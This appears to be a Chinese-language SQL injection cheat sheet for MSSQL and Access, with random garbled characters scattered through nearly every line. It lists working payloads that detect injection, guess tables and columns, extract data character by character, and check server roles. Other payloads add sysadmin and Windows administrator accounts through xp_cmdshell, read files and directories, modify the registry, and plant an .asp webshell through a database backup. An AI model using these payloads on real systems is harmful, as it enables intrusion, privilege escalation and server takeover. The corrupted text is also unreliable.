1.判断是否有注入;and 1=1 ;and 1=2 -R\dg��S�3
2.初步判断是否是mssql ;and user>0 B##X94aTT�
Nv6�"c<(L=
3.注入参数是字符'and [查询条件] and ''=' be5N{lPT@;
?N!kYTR%}�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 6h %r��t]g
WBm)Q#1��:
5.判断数据库系统 -%^'�x&��e
RU~ku�{8�?
;and (select count(*) from sysobjects)>0 mssql =]/�<Kd}A.
=�{N1j<%fh
;and (select count(*) from msysobjects)>0 access #Q*V9kvU/H
oDi�+\�0��
,�w�BfGpVb
t*)mX��2R,
6.猜数据库 ;and (select Count(*) from [数据库名])>0 4�i^WE;|s�
j:��/Z�_v'
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 R:R<Xt N`5
�C��A5�`uh
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 &;L=f��; �
.uxM&�|0H�
9.(1)猜字段的ascii值(access) �>V)"T�Z�H
���9|v�%bO
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %�%>nM'4<�
j0a�=v}j3�
(2)猜字段的ascii值(mssql) +8�i��t�P>
a_?b��<���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ���N��@}h�
/�S1/��ZI�
10.测试权限结构(mssql) V %D�1Q}X�
%9Z�0\
a)[
,-8��-Y>�[
&vn2u bauS
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
6ST(=�X_C
=y��)K� er
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 9�:-7.^�`P
�fF����r9]
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �b�.@��4yW
�BK6
X)1R�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �v~x�4Y,m%
�{+�E]c:�{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ,$>�l[G;Bm
xz.Jmv���
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- LbRQ�jwc]W
�D�F��4CB#
;and 1=(select IS_MEMBER('db_owner'));-- ^7YNM<_%@�
�"�`4ky��]
4"(rZW���v
(=Kv1
H�aD
11.添加mssql和系统的帐户 rq�qd} k�A
s-�P��S]l@
;exec master.dbo.sp_addlogin username;-- ��[�x�r^t1
;exec master.dbo.sp_password null,username,password;-- ��4R\jZ@�D
�e(|Z<��6�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- cG�g�fCF^`
aK@
Y) Ju'
;exec master.dbo.xp_cmdshell 'net user username password sVw:d�_� E
tzIP4CR~F&
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Q���Rf>lZP
jga�\Ry=nw
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �igk<]AwxS
V@#oQi�*��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- TPk?MeVy%W
�\W�E&5
9G
3-{�BXh�t)
DR}I+<*%aD
12.(1)遍历目录 p8%qU>�~+4
A?�!R��F7v
;create table dirs(paths varchar(100), id int) N\g=�9o�|Q
!�uW��*~u�
;insert dirs exec master.dbo.xp_dirtree 'c:\' &TQ~!ZMOR"
V@k+R�niEO
;and (select top 1 paths from dirs)>0 Z��}u��Y%]
�Zdqm|_�R[
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) f�P|[4 ku�
g}�D)MlXRq
NF6xKwRU]_
PD0&ep1h7G
(2)遍历目录 CMW4�Zqau*
�8e*s�kL��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- BL16?&RK��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 J�pC=A�CF
^��WO3��,
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 EOrui:.B)�
rtJER?��A�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 W�{"�s�B:E
z0<���E3t
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��ZPG,o5`%
:&vX0
�Ce:
l1D�J<I�2
��znsQ�/�[
13.mssql中的存储过程 �zY_J7,�0g
��h2Nt���@
xp_regenumvalues 注册表根键, 子键 ��D�:U6r^c
rz%~=Ca2j�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 iv~�R4;;�)
iF^qbh%%E�
xp_regread 根键,子键,键值名 ,Zn6T"[��$
t[�`L�G)�
;exec xp_regread lfHN_fE>Mq
�����O>]i?
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 .Q��!d[vL
e�+l�un
�-
xp_regwrite 根键,子键, 值名, 值类型, 值 w{*kbGB8s7
}S u�j=oFp
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;m�7G8�)I�
l!x+K�&���
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Q`9c�/vPU�
\
T#�|<=
xp_regdeletevalue 根键,子键,值名
^^�"zjl*^
KBB)xe�z8
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 o(SPT�?ao~
�r8�9A�X{:
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �hAf/&�yA@
�
U=��~?ca
U_*,���XLU
p [C�
9��g
14.mssql的backup创建webshell D5c
�8�sB�
L�sWD�^JE.
use model �-�n�9&�W
; R��+>}�6
create table cmd(str image); n�\((#�<&�
S<i1t[E�@W
insert into cmd(str) values (''); )�%@7tx��
)ov�A�G��O
backup database model to disk='c:\l.asp'; Nj4CkM�M[3
<4G�y~��?
61H�_o7XXk
\��lQ3j8�U
15.mssql内置函数 $�@'B�B=�i
?0t^7H��MP
;and (select @@version)>0 获得Windows的版本号 [=(8yUV'�G
h_(M��#�gG
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ����nnj<k5
z='%N���ZY
;and (select user_name())>0 爆当前系统的连接用户 �(-WRZLOQ�
_�A��C�N
;and (select db_name())>0 得到当前连接的数据库 p�Run5� )7
d M�R?�pbD
$!�*>�5".A
t�/;�0/ql\
16.简洁的webshell v%�qOW�)].
E_�=F'�sP?
use model ~".@mubt1$
�����"M�5�
create table cmd(str image); S�#M8}+ZD,
5\�pS8<RJ;
insert into cmd(str) values (''); Fy{y��g]O"
�3l<q�cKKc
backup database model to disk='g:\wwwtest\l.asp';
